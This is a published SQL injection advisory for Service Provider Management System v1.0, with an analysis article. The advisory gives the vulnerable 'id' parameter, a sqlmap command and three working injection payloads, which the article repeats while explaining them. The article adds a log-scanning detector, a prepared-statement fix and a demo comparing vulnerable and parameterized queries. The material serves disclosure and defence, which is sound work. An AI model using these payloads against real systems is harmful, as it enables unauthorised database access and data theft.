Service Provider Management System v1.0 - SQL Injection

Exploit Author: ASHIK KUNJUMON
Analysis Author: www.bubbleslearn.ir
Category: WebApps
Language: PHP
Published Date: 2023-05-24
# Exploit Title: Service Provider Management System v1.0 - SQL Injection
# Date: 2023-05-23
# Exploit Author: Ashik Kunjumon
# Vendor Homepage: https://www.sourcecodester.com/users/lewa
# Software Link: https://www.sourcecodester.com/php/16501/service-provider-management-system-using-php-and-mysql-source-code-free-download.html
# Version: 1.0
# Tested on: Windows/Linux

1. Description:

Service Provider Management System v1.0 allows SQL injection via the id
parameter in /php-spms/?page=services/view&id=2.
Exploiting this issue could allow an attacker to compromise the
application, read or modify data, or exploit other vulnerabilities in
the underlying database.

Endpoint: /php-spms/?page=services/view&id=2

Vulnerable parameter: id (GET)

2. Proof of Concept:
----------------------

Step 1 - Visit the URL http://localhost/php-spms/?page=services/view&id=2
and append a single quote to the id value to verify the SQL injection.
Step 2 - Run: sqlmap -u "http://localhost/php-spms/?page=services/view&id=2"
-p id --dbms=mysql

SQLMap Response:
----------------------
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: page=services/view&id=1' AND 8462=8462 AND 'jgHw'='jgHw

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: page=services/view&id=1' AND (SELECT 1839 FROM(SELECT COUNT(*),CONCAT(0x7178717171,(SELECT (ELT(1839=1839,1))),0x7176786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Cqhk'='Cqhk

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=services/view&id=1' AND (SELECT 1072 FROM (SELECT(SLEEP(5)))lurz) AND 'RQzT'='RQzT


Service Provider Management System v1.0 – SQL Injection Vulnerability Analysis

SQL injection remains one of the most prevalent and dangerous web application vulnerabilities, particularly in legacy systems built with minimal security controls. The Service Provider Management System v1.0, a PHP-based application available on SourceCodester, exemplifies how inadequate input validation can expose critical data and enable full system compromise.

Overview of the Vulnerability

The application, designed for managing service providers, allows users to view service details via a URL parameter: /php-spms/?page=services/view&id=2. The id parameter is directly used in a SQL query without proper sanitization, making it a prime target for SQL injection attacks.

Exploits were confirmed by Ashik Kunjumon on May 23, 2023, and verified using automated tools like sqlmap. This vulnerability is classified as high severity due to its potential to extract sensitive data, modify records, or even escalate to full database access.

Proof of Concept: Demonstrating the Injection

Attackers can begin by simply appending a single quote (') to the id parameter:

http://localhost/php-spms/?page=services/view&id=2'

Upon submission, the server responds with an error message such as:

SQL syntax error near '2''

This confirms that the input is directly embedded into the SQL query without escaping, indicating a clear injection point.

Exploitation Techniques Identified by sqlmap

Using sqlmap with the target URL and specifying the id parameter, three distinct exploitation techniques were detected:

  • Boolean-based blind: The attacker uses conditional statements like AND 8462=8462 to determine whether the query returns a true or false result. This allows inference of data without direct output.
  • Error-based: Abuses the duplicate-key error that MySQL raises when GROUP BY is applied over FLOOR(RAND(0)*2), so that the error message carries a value chosen by the attacker. For example:
page=services/view&id=1' AND (SELECT 1839 FROM(SELECT COUNT(*),CONCAT(0x7178717171,(SELECT(ELT(1839=1839,1))),0x7176786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Cqhk'='Cqhk

This payload forces MySQL to return an error message containing the marker strings hex-encoded as 0x7178717171 and 0x7176786271; sqlmap uses them to delimit the value that sits between them, which is how the technique reads out the database version, user names, or table names.

  • Time-based blind: Uses SLEEP(5) to delay the response. If the server takes 5 seconds to respond, the attacker knows the condition is true. This is useful when no direct output is available.
page=services/view&id=1' AND (SELECT 1072 FROM(SELECT(SLEEP(5)))lurz) AND 'RQzT'='RQzT

This technique is especially effective in environments where error messages are suppressed.
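As an added example (not part of the advisory or the analysis), the following Python script shows how a defender can spot the three sqlmap payload classes listed above in web server access logs. The log lines are constructed for this example and carry the exact payloads quoted in the advisory; the simplified combined-log format and the detection regexes are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (simplified Apache combined format): the first is
# a normal request, the next three carry the boolean-based, error-based
# (FLOOR/RAND) and time-based (SLEEP) payloads from the sqlmap output, URL-encoded.
SAMPLE_LOG = """\
10.0.0.5 - - [23/May/2023:10:01:02 +0000] "GET /php-spms/?page=services/view&id=2 HTTP/1.1" 200 4123
10.0.0.9 - - [23/May/2023:10:01:07 +0000] "GET /php-spms/?page=services/view&id=1%27%20AND%208462%3D8462%20AND%20%27jgHw%27%3D%27jgHw HTTP/1.1" 200 4123
10.0.0.9 - - [23/May/2023:10:01:08 +0000] "GET /php-spms/?page=services/view&id=1%27%20AND%20(SELECT%201839%20FROM(SELECT%20COUNT(*),CONCAT(0x7178717171,(SELECT(ELT(1839%3D1839,1))),0x7176786271,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20%27Cqhk%27%3D%27Cqhk HTTP/1.1" 500 512
10.0.0.9 - - [23/May/2023:10:01:14 +0000] "GET /php-spms/?page=services/view&id=1%27%20AND%20(SELECT%201072%20FROM(SELECT(SLEEP(5)))lurz)%20AND%20%27RQzT%27%3D%27RQzT HTTP/1.1" 200 4123
"""

# Client IP, timestamp, method, request target and status from one log line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Each rule is (label, pattern applied to the URL-decoded parameter value).
# The patterns follow the shape of the three payloads in the advisory.
RULES = [
    ("boolean-based blind", re.compile(r"'\s*AND\s+\d+\s*=\s*\d+\s*AND\s*'[A-Za-z]+'\s*=\s*'", re.I)),
    ("error-based (FLOOR/RAND)", re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I)),
    ("time-based blind (SLEEP)", re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I)),
]


def classify_value(value):
    """Return the labels of every rule matching one decoded parameter value."""
    return [label for label, rx in RULES if rx.search(value)]


def scan_log(text):
    """Return (ip, status, parameter, labels) for every request whose query
    string carries a suspicious value. Every parameter is checked, not only
    id, so the same scan covers other injectable endpoints."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not parse rather than fail the scan
        query = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
        for name, values in query.items():  # parse_qs already URL-decodes
            for value in values:
                labels = classify_value(value)
                if labels:
                    hits.append((m["ip"], int(m["status"]), name, labels))
    return hits


if __name__ == "__main__":
    for ip, status, param, labels in scan_log(SAMPLE_LOG):
        print(f"{ip} status={status} param={param} -> {', '.join(labels)}")
```

A 500 status on a flagged request (the error-based line here) is the strongest signal, since it indicates the injected SQL actually reached the database.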

Impact and Risk Assessment

Due to the lack of input validation, an attacker can:

  • Extract all service records, including sensitive customer data.
  • Modify or delete service entries by crafting malicious queries.
  • Access database metadata such as table names, column structures, and user credentials.
  • Perform privilege escalation by injecting commands that modify user roles.

Moreover, because the backend is MySQL, an attacker could extend the injection with techniques such as UNION-based queries and, if the privileges of the database account allow it, reach beyond the application's own data.

Recommended Remediation Strategies

Developers and administrators must implement the following security measures:

  • Use Prepared Statements (Parameterized Queries): Replace direct SQL concatenation with parameterized queries to prevent injection.
  • Input Validation and Sanitization: Ensure that id is validated as an integer before use.
  • Implement Role-Based Access Control: Restrict access to service details based on user permissions.
  • Use Web Application Firewalls (WAF): Deploy WAFs like ModSecurity to detect and block SQL injection attempts.
  • Regular Security Audits: Conduct penetration testing and code reviews to identify vulnerabilities early.

Example: Secure Code Implementation

Here is a corrected version of the vulnerable code using prepared statements in PHP:


<?php
// Vulnerable pattern (original): the raw GET value is interpolated into the
// SQL text inside single quotes, which is the context the PoC payloads close
// with their leading quote.
$query = "SELECT * FROM services WHERE id = '{$_GET['id']}'";

// Secure implementation using PDO with a bound parameter
try {
    $pdo = new PDO("mysql:host=localhost;dbname=spms", "user", "pass", [
        PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION, // make failures throw so the catch below runs
    ]);
    // Reject anything that is not a positive integer before it reaches the query
    $id = filter_input(INPUT_GET, 'id', FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false || $id === null) {
        http_response_code(400);
        exit('Invalid id');
    }
    $stmt = $pdo->prepare("SELECT * FROM services WHERE id = ?");
    $stmt->execute([$id]);
    $result = $stmt->fetchAll(PDO::FETCH_ASSOC);
} catch (PDOException $e) {
    error_log("Database error: " . $e->getMessage()); // log server-side, never echo to the client
    http_response_code(500);
}
?>

This implementation ensures that user input is treated as a parameter, not part of the SQL command. The database engine handles the data safely, preventing injection.
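To show concretely why the bound parameter closes the hole, here is an added Python example (not code from the application or the advisory) that runs the advisory's boolean-based payload and the single-quote probe against both the vulnerable string-built query and a parameterized one. An in-memory SQLite table with constructed rows stands in for the MySQL services table.

```python
import sqlite3

# Constructed stand-in for the application's services table.
ROWS = [(1, "plumbing"), (2, "electrical"), (3, "painting")]


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE services (id INTEGER PRIMARY KEY, name TEXT)")
    db.executemany("INSERT INTO services VALUES (?, ?)", ROWS)
    return db


def view_vulnerable(db, user_id):
    """Mirrors the advisory's pattern: the GET value is spliced into the SQL
    text inside single quotes, so a value starting with a quote rewrites the
    WHERE clause instead of being compared as data."""
    return db.execute(f"SELECT name FROM services WHERE id = '{user_id}'").fetchall()


def view_parameterized(db, user_id):
    """Bound parameter: whatever the value contains, it is compared as a single
    literal and can never change the statement's structure."""
    return db.execute("SELECT name FROM services WHERE id = ?", (user_id,)).fetchall()


def view_validated(db, user_id):
    """Defence in depth as recommended above: reject anything that is not a
    positive integer before it reaches the query at all."""
    if not isinstance(user_id, str) or not user_id.isdigit() or int(user_id) < 1:
        raise ValueError("id must be a positive integer")
    return view_parameterized(db, int(user_id))


if __name__ == "__main__":
    db = make_db()
    true_payload = "2' AND 8462=8462 AND 'jgHw'='jgHw"   # from the sqlmap output
    false_payload = "2' AND 8462=8463 AND 'jgHw'='jgHw"  # same shape, false condition
    print("vulnerable, true  :", view_vulnerable(db, true_payload))   # row 2 returned
    print("vulnerable, false :", view_vulnerable(db, false_payload))  # nothing: the blind oracle
    print("parameterized     :", view_parameterized(db, true_payload))  # nothing: treated as text
    try:
        view_vulnerable(db, "2'")  # the single-quote probe from the PoC
    except sqlite3.OperationalError as e:
        print("vulnerable, probe :", e)  # syntax error, just as the advisory describes
```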

Conclusion

The Service Provider Management System v1.0 serves as a cautionary tale for developers relying on outdated or poorly secured frameworks. SQL injection is not just a theoretical risk—it is a real, actionable threat capable of compromising entire systems.

By understanding the mechanics of injection, using tools like sqlmap for detection, and applying secure coding practices, organizations can prevent exploitation and maintain data integrity. Security should never be an afterthought—it must be integrated from the start.